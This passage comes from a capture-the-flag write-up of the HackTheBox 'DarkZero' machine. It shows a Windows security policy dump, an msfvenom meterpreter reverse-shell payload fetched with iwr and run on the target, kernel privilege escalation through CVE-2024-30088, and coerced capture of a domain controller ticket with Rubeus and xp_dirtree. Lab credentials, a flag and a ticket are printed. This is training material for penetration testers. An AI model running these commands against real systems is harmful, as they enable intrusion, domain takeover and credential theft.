MACHINE\System\CurrentControlSet\Control\Lsa\DisableDomainCreds=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\FullPrivilegeAuditing=3,0
MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse=4,1
MACHINE\System\CurrentControlSet\Control\Lsa\MSV1_0\NTLMMinClientSec=4,536870912
MACHINE\System\CurrentControlSet\Control\Lsa\MSV1_0\NTLMMinServerSec=4,536870912
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM=4,1
MACHINE\System\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers\AddPrinterDrivers=4,1
MACHINE\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedExactPaths\Machine=7,System\CurrentControlSet\Control\ProductOptions,System\CurrentControlSet\Control\Server Applications,Software\Microsoft\Windows NT\CurrentVersion
MACHINE\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths\Machine=7,System\CurrentControlSet\Control\Print\Printers,System\CurrentControlSet\Services\Eventlog,Software\Microsoft\OLAP Server,Software\Microsoft\Windows NT\CurrentVersion\Print,Software\Microsoft\Windows NT\CurrentVersion\Windows,System\CurrentControlSet\Control\ContentIndex,System\CurrentControlSet\Control\Terminal Server,System\CurrentControlSet\Control\Terminal Server\UserConfig,System\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration,Software\Microsoft\Windows NT\CurrentVersion\Perflib,System\CurrentControlSet\Services\SysmonLog,SYSTEM\CurrentControlSet\Services\CertSvc
MACHINE\System\CurrentControlSet\Control\Session Manager\Kernel\ObCaseInsensitive=4,1
MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown=4,0
MACHINE\System\CurrentControlSet\Control\Session Manager\ProtectionMode=4,1
MACHINE\System\CurrentControlSet\Control\Session Manager\SubSystems\optional=7,
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\AutoDisconnect=4,15
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableForcedLogOff=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\NullSessionPipes=7,,netlogon,samr,lsarpc
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RestrictNullSessAccess=4,1
MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\EnablePlainTextPassword=4,0
MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\EnableSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\RequireSecuritySignature=4,0
MACHINE\System\CurrentControlSet\Services\LDAP\LDAPClientIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange=4,0
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\MaximumPasswordAge=4,30
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireStrongKey=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SealSecureChannel=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SignSecureChannel=4,1
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,*S-1-5-11,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-9
SeMachineAccountPrivilege = *S-1-5-11
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-11,*S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeSystemtimePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549
SeAuditPrivilege = *S-1-5-19,*S-1-5-20
SeIncreaseQuotaPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeIncreaseBasePriorityPrivilege = *S-1-5-32-544,*S-1-5-90-0
SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550
SeBatchLogonRight = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-559
SeServiceLogonRight = *S-1-5-20,svc_sql,SQLServer2005SQLBrowserUser$DC02,*S-1-5-80-0,*S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-548,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551,*S-1-5-9
SeSecurityPrivilege = *S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-32-544,*S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
SeManageVolumePrivilege = *S-1-5-32-544
SeRemoteInteractiveLogonRight = *S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeIncreaseWorkingSetPrivilege = *S-1-5-32-545
SeTimeZonePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549
SeCreateSymbolicLinkPrivilege = *S-1-5-32-544
SeDelegateSessionUserImpersonatePrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
- The next idea was to
escalatemyprivilegestoSYSTEMusing theMSSQL Service. - But unfortunately I was
not allowedtorestarttheservice.
PS C:\> Get-Service | ForEach-Object {
$svc = $_
$acl = Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" -ErrorAction SilentlyContinue
if ($acl) {
$acl.Access | Where-Object {$_.IdentityReference -like "*svc_sql*" -or $_.IdentityReference -like "*Domain Users*" -or $_.IdentityReference -like "*Authenticated Users*"}
}
}PS C:\>
RegistryRights : -2147483648
AccessControlType : Allow
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited : False
InheritanceFlags : ContainerInherit
PropagationFlags : InheritOnly
RegistryRights : ReadKey
AccessControlType : Allow
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited : False
InheritanceFlags : None
PropagationFlags : Nones
PS C:\> sc.exe sdshow MSSQLSERVER
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)
PS C:\> sc.exe qc MSSQLSERVER
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MSSQLSERVER
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SQL Server (MSSQLSERVER)
DEPENDENCIES : KEYISO
SERVICE_START_NAME : darkzero-ext\svc_sql
- Since I had to deal with two
DCs, I checked theActive Directory Truststatus. - and noticed that there was indeed a
Domain TrustbetweenDC01andDC02. - Conveniently, these domains were named as
darkzero.htbanddarkzero.ext.
PS C:\temp> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=darkzero.htb,CN=System,DC=darkzero,DC=ext
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : darkzero.htb
ObjectClass : trustedDomain
ObjectGUID : 700b5e64-8ae9-4528-a968-26e2b4a44509
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=darkzero,DC=ext
Target : darkzero.htb
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
- I then used
bloodhound-pythontodumpof theconfigurationof theActive Directoryto switch perspective.
┌──(kali@kali)-[/media/…/HTB/Machines/DarkZero/files]
└─$ bloodhound-python -u 'john.w' -p 'RFulUtONCOL!' -d 'darkzero.htb' -ns 10.129.174.93 -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: darkzero.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.darkzero.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.darkzero.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 5 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.darkzero.htb
INFO: Done in 00M 05S
- My main focus was to find a way back to
DC01and to getfootholdthroughDC02on which I already had a shell. - So I searched through the
*.computers.jsonand found out thatDC01was configured forUnconstrained Delegation.
┌──(kali@kali)-[/media/…/HTB/Machines/DarkZero/files]
└─$ cat 20251005133830_computers.json
{"data":[{"ObjectIdentifier": "S-1-5-21-1152179935-589108180-1989892463-1000", "AllowedToAct": [], "PrimaryGroupSID": "S-1-5-21-1152179935-589108180-1989892463-516", "LocalAdmins": {"Collected": true, "FailureReason": null, "Results": [{"ObjectIdentifier": "S-1-5-21-1152179935-589108180-1989892463-500", "ObjectType": "User"}, {"ObjectIdentifier": "S-1-5-21-1152179935-589108180-1989892463-519", "ObjectType": "Group"}, {"ObjectIdentifier": "S-1-5-21-1152179935-589108180-1989892463-512", "ObjectType": "Group"}]}, "PSRemoteUsers": {"Collected": true, "FailureReason": null, "Results": []}, "Properties": {"name": "DC01.DARKZERO.HTB", "domainsid": "S-1-5-21-1152179935-589108180-1989892463", "domain": "DARKZERO.HTB", "distinguishedname": "CN=DC01,OU=DOMAIN CONTROLLERS,DC=DARKZERO,DC=HTB", "unconstraineddelegation": true, "enabled": true, "trustedtoauth": false, "samaccountname": "DC01$", "haslaps": false, "lastlogon": 1759663368, "lastlogontimestamp": 1759429993, "pwdlastset": 1753789216, "whencreated": 1753789216, "serviceprincipalnames": ["Hyper-V Replica Service/DC01", "Hyper-V Replica Service/DC01.darkzero.htb", "Microsoft Virtual System Migration Service/DC01", "Microsoft Virtual System Migration Service/DC01.darkzero.htb", "Microsoft Virtual Console Service/DC01", "Microsoft Virtual Console Service/DC01.darkzero.htb", "Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.darkzero.htb", "ldap/DC01.darkzero.htb/ForestDnsZones.darkzero.htb", "ldap/DC01.darkzero.htb/DomainDnsZones.darkzero.htb", "DNS/DC01.darkzero.htb", "GC/DC01.darkzero.htb/darkzero.htb", "RestrictedKrbHost/DC01.darkzero.htb", "RestrictedKrbHost/DC01", "RPC/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb", "HOST/DC01/darkzero", "HOST/DC01.darkzero.htb/darkzero", "HOST/DC01", "HOST/DC01.darkzero.htb", "HOST/DC01.darkzero.htb/darkzero.htb", "E3514235-4B06-11D1-AB04-00C04FC2DCD2/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd/darkzero.htb", "ldap/DC01/darkzero", "ldap/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb", "ldap/DC01.darkzero.htb/darkzero", "ldap/DC01", "ldap/DC01.darkzero.htb", "ldap/DC01.darkzero.htb/darkzero.htb"], "description": null, "operatingsystem": "Windows Server 2025 Datacenter", "sidhistory": []}, "RemoteDesktopUsers": {"Collected": true, "FailureReason": null, "Results": []}, "DcomUsers": {"Collected": true, "FailureReason": null, "Results": []}, "AllowedToDelegate": [], "Sessions": {"Collected": true, "FailureReason": null, "Results": []}, "PrivilegedSessions": {"Collected": false, "FailureReason": null, "Results": []}, "RegistrySessions": {"Collected": false, "FailureReason": null, "Results": []}, "Aces": [{"RightName": "Owns", "IsInherited": false, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-512", "PrincipalType": "Group"}, {"RightName": "GenericAll", "IsInherited": false, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-512", "PrincipalType": "Group"}, {"RightName": "AddKeyCredentialLink", "IsInherited": true, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-526", "PrincipalType": "Group"}, {"RightName": "AddKeyCredentialLink", "IsInherited": true, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-527", "PrincipalType": "Group"}, {"RightName": "GenericAll", "IsInherited": true, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-519", "PrincipalType": "Group"}, {"RightName": "GenericWrite", "IsInherited": true, "PrincipalSID": "DARKZERO.HTB-S-1-5-32-544", "PrincipalType": "Group"}, {"RightName": "WriteOwner", "IsInherited": true, "PrincipalSID": "DARKZERO.HTB-S-1-5-32-544", "PrincipalType": "Group"}, {"RightName": "WriteDacl", "IsInherited": true, "PrincipalSID": "DARKZERO.HTB-S-1-5-32-544", "PrincipalType": "Group"}], "HasSIDHistory": [], "IsDeleted": false, "Status": null, "IsACLProtected": false}],"meta":{"methods":0,"type":"computers","count":1, "version":5}}
<--- CUT FOR BREVITY --->
"Properties": { "name": "DC01.DARKZERO.HTB", "unconstraineddelegation": true, // ← THIS "enabled": true,
<--- CUT FOR BREVITY --->
- This meant if I could figure out a way to catch a
Kerberos TicketfromDC01onDC02, eventually throughCoercion, - I then could initiate a
DCSyncand grab thehashof theAdministratoraccount ofDC01.
Privilege Escalation to SYSTEM on DC02
- First of all I needed to get
SYSTEMonDC02. I fired upMetasploitto runlocal_exploit_suggester.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ msfconsole
Metasploit tip: Use the resource command to run commands from a file
______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/
=[ metasploit v6.4.84-dev ]
+ -- --=[ 2,547 exploits - 1,309 auxiliary - 1,683 payloads ]
+ -- --=[ 432 post - 49 encoders - 13 nops - 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.10.16.45
LHOST => 10.10.16.45
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.45:4444
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.45 LPORT=4444 -f exe -o asdf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: asdf.exe
PS C:\temp> iwr 10.10.16.45/asdf.exe -o asdf.exe
PS C:\temp> .\asdf.exe
[*] Sending stage (203846 bytes) to 10.129.174.93
[*] Meterpreter session 2 opened (10.10.16.45:4444 -> 10.129.174.93:53722) at 2025-10-05 06:19:38 +0200
meterpreter >
- I sifted through the output and after a bit of testing, figured out that
CVE-2024-30088used a flaw in theWindows Kernel. - In order to perform
Token Manipulationwhich ends up inLocal Privilege Escalation (LPE). CVE News on CVE-2024-30088
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 172.16.20.2 - Collecting local exploits for x64/windows...
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
[*] 172.16.20.2 - 206 exploit checks are being tried...
[+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30085_cloud_files: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 49 / 49
[*] 172.16.20.2 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
4 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
6 exploit/windows/local/cve_2024_30085_cloud_files Yes The target appears to be vulnerable.
7 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
8 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
9 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
10 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
11 exploit/windows/local/always_install_elevated No The target is not exploitable.
12 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
13 exploit/windows/local/bypassuac_comhijack No The target is not exploitable.
14 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/capcom_sys_exec No Cannot reliably check exploitability.
19 exploit/windows/local/cve_2019_1458_wizardopium No The target is not exploitable.
20 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows!
21 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
22 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
23 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 6.2.20348.2110
24 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
25 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
26 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
27 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
28 exploit/windows/local/cve_2021_40449 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
29 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
30 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
31 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
32 exploit/windows/local/ikeext_service No The check raised an exception.
33 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
34 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2022 (10.0 Build 20348). is not vulnerable
35 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability.
36 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
37 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability.
38 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable.
39 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
40 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
41 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
42 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
43 exploit/windows/local/panda_psevents No The target is not exploitable.
44 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
45 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
46 exploit/windows/local/tokenmagic No The target is not exploitable.
47 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
48 exploit/windows/local/webexec No The check raised an exception.
49 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
- I put the current session in the background and executed the
modulefor theauthz_basepexploit.
meterpreter > background
[*] Backgrounding session 2...
msf exploit(multi/handler) > use exploit/windows/local/cve_2024_30088_authz_basep
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 2
SESSION => 2
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LHOST 10.10.16.45
LHOST => 10.10.16.45
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LPORT 4445
LPORT => 4445
msf exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.45:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 3988...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 784
[+] Successfully retrieved winlogon pid: 616
[*] Sending stage (203846 bytes) to 10.129.174.93
[*] Meterpreter session 2 opened (10.10.16.45:4445 -> 10.129.174.93:53643) at 2025-10-05 06:24:28 +0200
meterpreter >
- And now, I had got a shell back as
NT AUTHORITY\SYSTEMon theDC02System.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
- This allowed me to grab the
user.txtfrom within theDesktopofAdministratoronDC02.
meterpreter > cat C:\\Users\\Administrator\\Desktop\\user.txt
6285a04da10fe74f3523728444dfd022
Privilege Escalation to SYSTEM on DC01
- I still had the
Unconstrained Delegationin the back of my head. - The easiest way I could think of was to catch a
TicketonDC02usingRubeusand trigger it throughMSSQLonDC01. - To make things easy, I created a
SOCKS5configuration throughMetasploitto reach theinstanceonDC01.
msf exploit(windows/local/cve_2024_30088_authz_basep) > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf auxiliary(server/socks_proxy) > set SRVPORT 1080
SRVPORT => 1080
msf auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 0.
msf auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ proxychains4 -q impacket-mssqlclient 'darkzero.htb/john.w:RFulUtONCOL!'@'DC01.darkzero.htb' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>
Use Rubeus to catch Ticket Granting Ticket (TGT)
- I moved
Rubeusover toDC02and fired it up inmonitor modelistening forincoming tickets. - This only worked because I had
elevatedtheprivilegestoSYSTEMfirst.
meterpreter > shell
Process 124 created.
Channel 2 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\temp> iwr 10.10.16.45/Rubeus.exe -o Rubeus.exe
C:\temp\Rubeus.exe monitor /interval:1 /filteruser:DC01$ /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: TGT Monitoring
[*] Target user : DC01$
[*] Monitoring every 1 seconds for new TGTs
- Next I used
xp_dirtreefrom within theMSSQL ShellofDC01requesting the share onDC02.
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\foobar
subdirectory depth file
------------ ----- ----
SQL (darkzero\john.w guest@master)>
- And
Rubeuscaught the ticket that i was looking for.
[*] 10/5/2025 11:22:49 AM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 10/5/2025 4:22:48 AM
EndTime : 10/5/2025 2:22:48 PM
RenewTill : 10/12/2025 4:22:48 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYPPzgInQu2joilihgD51S/tHe9LnYS/EqXm5T1cl82tmQx7MgKt03n8Lf7b4RE3lTxRinPevS9AHAD78RmgMr6R4/b+jxUZLrK7x+WrAHg70iX7q6/9EBj3wUE5ISrkhnhHUmM2e8Xd6dug+3RhbiC0McqfsHhHA3n/enCq+vCkhSkcv7NZF3TGHbU/wIK0rFpwacqxIUbgvWkwVuG+ds0aQG3/5WQXnNpOZ9KUOl3xC+8MhLlXkJokCa4VvKSFVVe96uFHLsSiTzKffWz5OIysaUJq5rRc4+fb/QVpSlyGuoi2MJnDocvtFPRtH/6B/01lv2VnKDUh3rebkMwl/bZi+NUuHSr8b97UpWqLAIiO7W3UWaqG531rBAJ37LxrRWC0xjK7egOSZbmq+Wn2gyKd1Xl+/XNPUR9KK83L6dW+IOLSYcAmZmv1VbanvnRs1WDsNic2Il6sGluHye2ws/JXMNgHSA8IRpGlRU9zxS3E+/hmz7itLjk0nQURlJzjoQearRpEIUv0V4Md8p5GRnqg6hbmkbd22UKKVtHOEU1bwEGJeAZfSHrqx6em5hgLp0wr/Bl7pMIuBEbXPHFjb0a0JNWmBo51HWXer0Jju5ZWwK+RzadXiOkv+n+SlMoDvvFOqfb9ARJ+HiIgalndcR9FjeciBPa96tz+5wbEsUhFY7hfdkMkufN1zcxA1nQGYUAdrVcU9J97lLGs1qG5Tk9SKlYrTT3eupNc7+PzVNOXG211ht9TNigrNGX+2gz5nvLJbOqTB3QHbWvAFufV2fIo8BZIh44iaDUKyX5uMJVOPpU5E6jKmZpMrPCX/Y6uhZSg6DltuFNh3SnUM9e3zGRS6irqMdynYQHu3916o3t2ZB5Xp8PuhvnaO43Q9zeCEwmFVSJ4XvtezFBUXHjBtGBD05WqnqwBeZ5ZmRVwRNdrrWChqbR8A0yssIUeOzn2lqMWwYPF0/VLvP7Z3869T7mq6T2gwKhv5rKASSYW0oCPaP2YqoJoZdNi/T9QF8OXodzKnJ+e22cPuzb3/3YNiYrh